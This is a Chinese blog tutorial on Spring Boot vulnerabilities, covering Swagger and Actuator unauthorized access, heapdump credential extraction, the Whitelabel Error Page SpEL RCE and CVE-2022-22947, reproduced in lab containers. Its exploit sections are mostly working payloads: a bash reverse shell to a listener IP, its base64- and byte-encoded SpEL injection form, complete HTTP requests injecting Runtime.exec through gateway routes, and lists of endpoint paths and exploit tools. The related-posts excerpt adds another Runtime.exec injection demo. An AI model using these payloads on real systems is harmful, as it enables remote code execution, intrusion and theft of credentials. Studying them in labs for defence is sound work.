SpringBoot常见漏洞总结

于 2025-04-02 11:35:48 发布
阅读量1.1k 收藏 10
点赞数 16
文章标签: spring boot 后端 java 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43531669/article/details/146497517
版权

Spring Boot 介绍

Spring 是 Java EE 编程领域的一个轻量级开源框架,Spring Boot 是基于 Spring 优化而来的开源框架,旨在简化企业级应用程序的配置和开发过程。它遵循“约定优于配置”的理念,通过自动配置、内嵌 Web 服务器(如 Tomcat、Jetty 等)以及众多开箱即用的 Starter 依赖,大幅降低了项目启动和开发的复杂性,使开发者能够快速构建独立运行、生产级的应用。

框架特征

人工识别
  1. Spring Boot 绿色叶子的logo(favicon.ico文件)
fofa语法:icon_hash="116323821"||body="Whitelabel Error Page"
ZoomEye语法:app="Spring Framework"

绿色树叶图标其实是整个 Spring 生态系统的标志,不仅仅代表 Spring Boot。

  1. 检查异常响应(在端口后面随便输入一个URL), Whitelabel Error Page关键字

Whitelabel Error Page 是 Spring Boot 框架特有的默认错误页面

fofa语法:body="Whitelabel Error Page"

在这里插入图片描述

工具识别

  1. 浏览器扩展:wappalyzer(仅能确定是 spring)
    在这里插入图片描述

  2. goby
    在这里插入图片描述

  3. awvs
    在这里插入图片描述

Swagger 未授权访问

Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务,JAVA 在金融机构开发语言的地位一直居高不下,而作为 JAVA 届服务端的大一统框架 Spring,便将 Swagger 规范纳入自身的标准,建立了 Spring-swagger 项目,所以在实际测试环境中,基于 Spring 框架的 swagger-ui 接口展示及调试文档页面最为常见。

在平时渗透测试的的时候,经常会发现 Swagger UI 页面泄露,在这个页面中暴露了目标站点中所有的接口信息,所以可以对这个接口进行漏洞测试,看是否存在未授权访问、sql 注入、文件上传等漏洞。
在这里插入图片描述

Fofa语法:title="Swagger UI"
Google语法:intitle:"Swagger UI" site:yourarget.com
漏洞成因

Swagger 未开启页面访问限制
Swagger 未开启严格的Authorize认证

常见路径:

Swagger 未授权访问地址可能存在于以下默认路径:

/api
/api-docs
/api-docs/swagger.json
/api.html
/api/api-docs
/api/apidocs
/api/doc
/api/swagger
/api/swagger-ui
/api/swagger-ui.html
/api/swagger-ui.html/
/api/swagger-ui.json
/api/swagger.json
/api/swagger/
/api/swagger/ui
/api/swagger/ui/
/api/swaggerui
/api/swaggerui/
/api/v1/
/api/v1/api-docs
/api/v1/apidocs
/api/v1/swagger
/api/v1/swagger-ui
/api/v1/swagger-ui.html
/api/v1/swagger-ui.json
/api/v1/swagger.json
/api/v1/swagger/
/api/v2
/api/v2/api-docs
/api/v2/apidocs
/api/v2/swagger
/api/v2/swagger-ui
/api/v2/swagger-ui.html
/api/v2/swagger-ui.json
/api/v2/swagger.json
/api/v2/swagger/
/api/v3
/apidocs
/apidocs/swagger.json
/doc.html
/docs/
/druid/index.html
/graphql
/libs/swaggerui
/libs/swaggerui/
/spring-security-oauth-resource/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/sw/swagger-ui.html
/swagger
/swagger-resources
/swagger-resources/configuration/security
/swagger-resources/configuration/security/
/swagger-resources/configuration/ui
/swagger-resources/configuration/ui/
/swagger-ui
/swagger-ui.html
/swagger-ui.html#/api-memory-controller
/swagger-ui.html/
/swagger-ui.json
/swagger-ui/swagger.json
/swagger.json
/swagger.yml
/swagger/
/swagger/index.html
/swagger/static/index.html
/swagger/swagger-ui.html
/swagger/ui/
/Swagger/ui/index
/swagger/ui/index
/swagger/v1/swagger.json
/swagger/v2/swagger.json
/template/swagger-ui.html
/user/swagger-ui.html
/user/swagger-ui.html/
/v1.x/swagger-ui.html
/v1/api-docs
/v1/swagger.json
/v2/api-docs
/v3/api-docs
靶场复现

使用 Java Sec Code 的靶场环境,使用 docker 搭建。

靶场链接:https://github.com/JoyChou93/java-sec-code

进入目录后
docker compose up -d

登录用户名密码:

admin/admin123
joychou/joychou123

在这里插入图片描述
实际上 java-sec-code 靶场并不存在 Swagger-ui 未授权访问漏洞,需要用户登录以后才能访问到 swagger-ui,此处我们假设无需登录即可访问:

路径 /swagger-ui/index.html 查看生成的API接口文档。
在这里插入图片描述
可尝试测试功能接口参数,对系统数据进行增删改查等操作。以 login 接口为例:

点击 Try it out --> Execute 可以调用接口并查看服务器返回数据
在这里插入图片描述
在这里插入图片描述
SSRF 漏洞接口测试
在这里插入图片描述

批量探测

访问 api-docs 或者 swagger.json 可以直接获取 Json 格式的全部接口文档,通过 json 文档地址配合 swagger-scan 工具,可批量自动化爬取并自动测试所有swagger接口。

项目地址:https://github.com/jayus0821/swagger-hack
在这里插入图片描述
在这里插入图片描述

python swagger-hack2.0.py -u https://IP:port/json文档路径

会自动构造参数并发送请求包,扫描完成后目录下会有一个swagger.csv文档,我们可以在里面找信息泄露的接口(这里搭建的靶场执行没结果,换了个环境):
在这里插入图片描述
在这里插入图片描述

APIKit 扩展

APIKit 是 BurpSuite 扩展,可以主动/被动扫描发现应用泄露的API文档,并将API文档解析成 BurpSuite 中的数据包用于API安全测试。

支持的API技术的指纹有:

 GraphQL
 OpenAPI-Swagger
 SpringbootActuator
 SOAP-WSDL
 REST-WADL

在这里插入图片描述
在遇到 swagger 页面泄露的时候,如果想手动测试接口,又因为接口太多不想一个点,这时就可以使用此扩展。

APIKit会对进入到BurpSuite的流量进行被动扫描。解析完成后可以在APIKit面板查看结果
在这里插入图片描述

在这里插入图片描述

  • Send with Cookie:开启Cookie,可以把包的Cookie存下来,生成请求的时候保留Cookie。
  • Auto Request Sending:选择开启Auto Request Sending后,可以对子API进行自动化鉴权测试,快速发现API未授权访问漏洞。
    在这里插入图片描述
    主动扫描:
    可以在任何一个Burpsuite可以右键打开更多选项的页面中,都可以点击右键,选择Do Auto API scan来发起一次主动扫描,进行API指纹探测。
    在这里插入图片描述

Spring Boot Actuator 未授权访问

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息,从而导致信息泄露甚至服务器被接管的事件发生。

常见端点

Actuator 提供的执行器端点分为两类:原生端点和用户自定义扩展端点,原生端点主要有:

路径描述
/autoconfig提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过
/beans描述应用程序上下文里全部的Bean,以及它们的关系
/env获取全部环境属性
/configprops描述配置属性(包含默认值)如何注入Bean
/dump获取线程活动的快照
/health报告应用程序的健康指标,这些值由HealthIndicator的实现类提供
/info获取应用程序的定制信息,这些信息由Info打头的属性提供
/mappings描述全部的URL路径,以及它们和控制器(包含Actuator端点)的映射关系
/metrics报告各种应用程序度量信息,比如内存用量和HTTP请求计数
/shutdown关闭应用程序,要求endpoints.shutdown.enabled设置为true
/trace提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)

对于漏洞比较重要的接口和其可能的利用方式,总结如下:

接口利用方式
/env、/actuator/envGET 请求 /env 可能会直接泄露环境变量、内网地址、配置中的用户名、mysql 安装路径、数据库密码(可能带*)、关键密钥等敏感数据
/heapdump、/actuator/heapdump可尝试访问网站的 /actuator/heapdump 接口,下载返回的 GZip 压缩 堆转储文件,可使用 Eclipse MemoryAnalyzer 加载,通过站点泄露的内存信息,有机会查看到后台账号信息和数据库账号等
/trace、/actuator/trace/trace 路径包含一些 http 请求包访问跟踪信息,有可能在其中发现内网应用系统的一些请求信息详情、以及有效用户或管理员的 authorization(token、JWT、cookie)等字段
/mappings、/actuator/mappings由于 mappings 记录了全部的 Url 路径,可以利用该端点寻找未授权接口
/health、/actuator/healthGit 项目地址的泄露一般在 /health 路径,可探测到站点 git 项目地址并查看源码
/refresh、/actuator/refreshPOST 请求 /env 接口设置属性后,可同时配合 POST 请求 /refresh 接口刷新 /env 属性变量来触发相关 RCE 漏洞
/restart、/actuator/restart暴露出此接口的情况较少,可以配合 POST请求 /env 接口设置属性后,再 POST 请求 /restart 接口重启应用来触发相关 RCE 漏洞
/jolokia、/actuator/jolokia可以通过 /jolokia/list 接口寻找可以利用的 MBean,间接触发相关 RCE 漏洞、获得星号遮掩的重要隐私信息的明文等。

需要注意的是:

  • 有些程序员会自定义 /manage/management 、项目 App 相关名称为 spring 根路径。
  • Spring Boot Actuator 1.x 版本默认内置路由的起始路径为 / ,2.x 版本则统一以 /actuator 为起始路径。
  • Spring Boot Actuator 默认的内置路由名字,如 /env 有时候也会被程序员修改,比如修改成 /appenv
靶场复现

使用 Vulhub 靶场的 CVE-2022-22947 环境进行复现

cd vulhub/spring/CVE-2022-22947
docker compose up -d

靶场的Actuator是 2.x 版本的

在这里插入图片描述

/actuator/heapdump 堆转储文件

访问后可以下载到一个 hprof 格式的堆转储文件 heapdump
在这里插入图片描述
使用工具查看
JDumpSpider,链接:https://github.com/whwlsfb/JDumpSpider
heapdump_tool ,链接:https://github.com/wyzxxz/heapdump_tool

第一款工具 JDumpSpider

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

自动识别、提取敏感信息并进行分类,可惜本环境没有什么敏感信息:
在这里插入图片描述

第二款工具 heapdump_tool

java -jar heapdump_tool.jar heapdump

可以输入关键字进行检索。
在这里插入图片描述
有时会泄露账户密码,shirokey 等敏感信息。
在这里插入图片描述

/env 路径敏感信息

本靶场环境不存在敏感数据,借用网上案例,/env 路径泄露多个敏感账户密码:
在这里插入图片描述
在这里插入图片描述

/trace 路径泄露认证凭据

在这里插入图片描述
在这里插入图片描述

/health 路径泄露 Git 项目地址

在这里插入图片描述

/mappings 路径泄露所有 API

在这里插入图片描述

Whitelabel Error Page SpEL RCE

漏洞原理:

由于 SpelView 类中的 exactMatch 参数未严格过滤,Spring Boot framework 对异常处理不当在同时开启 whitelabel page,会造成异常请求中注入SPEL执行。当用户采用Spring Boot 启动 Spring MVC 项目后,Spring Boot 默认异常模板在处理异常信息时,会递归解析 SPEL 表达式,可导致 SPEL 表达式注入并执行。攻击者利用此漏洞,通过 SPEL 即可在服务器端实现指令注入(执行代码)。

利用条件:
  • spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0
  • 至少知道一个触发 springboot 默认错误页面的接口及参数名
漏洞复现:

使用 Vulfocus 的环境,环境搭建:

docker pull  vulfocus/spring-boot_whitelabel_spel:latest

docker run -d -p 9090:9090 镜像ID

在这里插入图片描述
步骤一:找到一个正常传参处
比如发现访问 /article?id=xxx,实战可以通过burp 等工具 fuzz。若网站状态码返回为500,则后续测试可在此id参数进行。
在这里插入图片描述
页面报状态码为 500 的错误: Whitelabel Error Page

步骤二:执行 SpEL 表达式
输入 /article?id=${7*7} ,如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上,那么基本可以确定目标存在 SpEL 表达式注入漏洞。
在这里插入图片描述
步骤三:反弹shell

bash -i >& /dev/tcp/192.168.56.130/7777 0>&1

将上面的反弹 shell 语句使用 base64 编码放在下面 echo 后面

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

将上面的 payload 通过下面py脚本转换为 java 字节形式

# coding: utf-8

result = ""
target = 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))

在这里插入图片描述
最终payload:

article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x63,0x20,0x7b,0x65,0x63,0x68,0x6f,0x2c,0x59,0x6d,0x46,0x7a,0x61,0x43,0x41,0x74,0x61,0x53,0x41,0x2b,0x4a,0x69,0x41,0x76,0x5a,0x47,0x56,0x32,0x4c,0x33,0x52,0x6a,0x63,0x43,0x38,0x78,0x4f,0x54,0x49,0x75,0x4d,0x54,0x59,0x34,0x4c,0x6a,0x55,0x32,0x4c,0x6a,0x45,0x7a,0x4d,0x43,0x38,0x33,0x4e,0x7a,0x63,0x33,0x49,0x44,0x41,0x2b,0x4a,0x6a,0x45,0x3d,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x65,0x36,0x34,0x2c,0x2d,0x64,0x7d,0x7c,0x7b,0x62,0x61,0x73,0x68,0x2c,0x2d,0x69,0x7d}))}

放在浏览器中执行
在这里插入图片描述
在这里插入图片描述
成功反弹。

Spring Cloud Gateway Actuator API SpEL RCE(CVE-2022-22947)

漏洞原理:

Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配置管理、服务注册与发现、智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合。

Spring Cloud Gateway 是 Spring 中的一个API网关,旨在提供一种简单而有效的方法来路由到 API 并为其提供横切关注点,例如:安全性、监控/指标和弹性。客户端发起请求给网关,网关处理映射找到一个匹配的路由,然后发送该给网关的 Web 处理器,处理器会通过一条特定的Filter链来处理请求,最后会发出代理请求,Filter 不仅仅做出预过滤,代理请求发出后也会进行过滤。

其 3.1.0 及 3.0.6 版本(包含)以前存在一处 SpEL 表达式注入漏洞,当 Gateway Actuator 端点启用、暴露且不安全时,使用 Spring Cloud Gateway 的应用程序很容易受到代码注入攻击。远程攻击者可能会发出恶意制作的请求,从而允许在远程主机上进行任意远程执行。

漏洞复现:

还是使用上面用过的 vulhub 靶场的 CVE-2022-22947 环境。

访问页面,默认路径 gateway 在页面 actuator 可访问,如下图所示:
在这里插入图片描述
从官方文档了解到,如果配置了暴露 actuator 端点,允许 jmx 或者 Web 访问,则可以通过 /gateway 接口与网关进行交互,并创建新的自定义路由。

利用这个漏洞需要发送两个 HTTP 数据包。

首先,发送如下数据包,添加一个包含恶意 SpEL 表达式的路由:

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.111.135:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

在这里插入图片描述
然后,发送如下数据包,应用刚添加的路由,这个数据包将触发 SpEL 表达式的执行:

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.111.135:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 331

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

在这里插入图片描述
访问 /actuator/gateway/routes/hacktest 路径即可查看执行结果:
在这里插入图片描述
成功执行命令,同理可以将恶意路由的 SpEL 表达式替换为 basse64 的反弹 shell 命令。

最后,发送如下数据包清理现场,删除所添加的路由:

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

再刷新下路由:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

漏洞自动化利用工具

最后介绍个 SpringBoot 框架漏洞探测工具:https://github.com/0x727/SpringBootExploit

启动命令:

java -jar SpringBootExploit-1.3-SNAPSHOT-all.jar

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

初识srpingboot未授权
afei001
06-09 453
1.师傅Blog 2.Springboot常见未授权路径解释 3.springboot heapdump内存分析工具 1.师傅Blog Springboot之actuator配置不当的漏洞利用:https://www.freebuf.com/news/193509.html SpringBootVulExploit:https://github.com/LandGrey/SpringBootVulExploit 2.Springboot常见未授权路径解释 Spring ...
spring框架漏洞整理(Springboot漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 4384
2016年爆出的一个漏洞Springboot漏洞利用条件 至少知道一个触发 springboot 默认错误页面的接口及参数名 利用方法 Springboot漏洞步骤一:找到一个正常传参处 比如发现访问/article?id=xxx,页面会报状态码为 500 的错误:Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。 Springboot漏洞步骤二:执行 SpEL 表达式
【网络安全必看】常用Springboot漏洞利用姿势总结
最新发布
白帽阿叁的博客
12-03 1755
随着互联网的不断发展,现在的Web开发发展越来越快,更多的企业选择使用框架快速搭建自己的系统。在众多的框架中,Spring Boot因为简单和高效的优点,受到了众多开发者的青睐。先来介绍一下Spring BootSpring Boot是由Pivotal团队提供的一套开源框架,可以简化spring应用的创建及部署。它提供了丰富的Spring模块化支持,可以帮助开发者更轻松快捷地构建出企业级应用。
浅析SpringBoot框架常见未授权访问漏洞
热门推荐
道阻且长,行则将至
02-23 1万+
本文总结学习了 Swagger-UI、SpringBoot Actuator、Druid、Webpack 组件的未授权访问漏洞基本原理与漏洞探测方法,在介绍了几款自动化扫描工具的同时,也简要分析了 CVE-2022-22947 Spring Cloud Gateway RCE 漏洞
spring相关漏洞利用工具-SpringBootExploit(二)
SuperherRo的博客
08-14 2545
项目是根据LandGrey/SpringBootVulExploit清单编写,目的hvv期间快速利用漏洞、降低漏洞利用门槛。
Actuator内存泄露及利用&Swagger未授权&自动化测试实现
qq_46081990的博客
12-20 3661
本文主要介绍了Actuator和Swagger的未授权访问导致的漏洞利用。Actuator提供了一系列端点用于监控和管理Spring Boot应用程序,但配置不当可能导致敏感信息泄露。Swagger是一个方便开发人员进行接口开发和测试的工具,可用于自动化接口漏洞安全测试。使用Postman、BurpSuite和Xray进行工具联动,自动化测试Swagger接口,可大大提升效率。
一款针对SpringBootEnv页面进行快速漏洞利用
Websec
10-31 350
本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。建议首先点击检测环境,会自动判断是否存在漏洞漏洞验证方法是Check list的方法,如果有更好的方法可以提交工单会考虑添加。由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。清单编写,目的hvv期间快速利用漏洞、降低漏洞利用门槛。该工具仅用于安全自查检测。
[附源码]计算机毕业设计springboot常见Web漏洞对应POC应用系统
李会计算机程序设计
11-28 712
项目运行环境配置:Jdk1.8 + Tomcat7.0 + Mysql + HBuilderX(Webstorm也行)+ Eclispe(IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持)。项目技术:SSM + mybatis + Maven + Vue 等等组成,B/S模式 + Maven管理等等。环境需要1.运行环境:最好是java jdk 1.8,我们在这个平台上运行的。其他版本理论上也可以。2.IDE环境:IDEA,Eclipse,Myeclipse都可以。
记一次若依框架和Springboot常见报错的实战漏洞挖掘
记录开发和安全学习过程中的点点滴滴
07-11 2151
又是摸鱼的一天,闲的没事,找个站玩玩,首先开局一个框,漏洞全靠扫,哦不对,全靠找.免责声明博文中涉及的方法可能带有危害性,仅供安全研究与教学之用,读者将其方法用作做其他用途,由读者承担全部法律及连带责任,文章作者不负任何责任.本次主要是对渗透测试中的一次实战进行记录,当然也是摸摸鱼的成果,主要是对若依常见的一些利用姿势和springboot的利用姿势做个总结
常见中间件重要漏洞总结
qq_50822277的博客
07-22 761
IIS深入浅出带你学习IIS中间件常见漏洞 IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入漏洞 IIS短文件名漏洞 RCE-CVE-2017-7269 Apache(php中间件) AddHandler解析漏洞 Apache HTTPD 换行解析漏洞(CVE-2017-15715) Apache HTTP 路径穿越漏洞(CVE-2021-41773) Apache HTTP 路径穿越漏洞(CVE-2021-42013) Apache SSI 远程命令执行漏洞 未知扩展名解析漏洞 目录遍
JNDIExploit-1.3-SNAPSHOT.jar
04-28
JNDIExploit是一款常用的用于JNDI注入利用的工具,命令执行&代码执行漏洞中常用的测试工具。
Spring Boot Actuator详解与漏洞利用
李火火的安全圈
08-19 7083
由Pivotal团队提供的全新框架,其设计的目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,Spring Boot致力于在蓬勃发展的快速应用开发领域(rapid application development)成为领导者。Actuator是Spring Boot提供的对应用系统的监控和管理。
生命在于学习——框架-中间件的学习(一)
易水哲的博客
09-06 1658
框架-中间件的漏洞学习
SpringBoot渗透总结
weixin_72753070的博客
07-25 1504
今天的文章主要跟大家聊一下关于springboot环境下的渗透Springboot现如今可以说是java开发的一个入门框架,深受各个公司亲赖,现有java站点springboot还是有一定比例的,所以说还是有必要对springboot渗透有一定了解。...
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 7882
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
三十种未授权访问漏洞复现 合集( 三)
qq_48368964的博客
08-04 1803
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
未授权访问漏洞
m0_63944205的博客
08-04 750
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure DockerSwarm for TLS这两篇文档,说的是配置好TLS后,DockerCLl在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。
(2022年12月最新)SpringBoot远程代码执行whitelabel error page SpEL RCE漏洞复现
qq1140037586的博客
12-20 3398
spring boot 处理参数值出错,流程进入org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。其中 ${} 包围的内容都会被org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞
Spring Boot Actuator 未授权的测试与利用思路
weixin_50464560的博客
09-30 2221
Spring Boot Actuator 未授权的测试与利用思路 0x0 前言   最近遇到的一个漏洞,但是因为目标关掉了一些端点导致没利用起来达到RCE的效果,不过在提升漏洞危害的时候,参考了不少文章,也做了一些尝试,所以分享出来自己的经历,希望大家如果遇到跟我一样的情况,可以省下自己调试时间,来做更有意义的事情。 0x1 Actuator 简介 官方简介: Spring Boot Actuator: Production-ready Features Spring Bo...
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值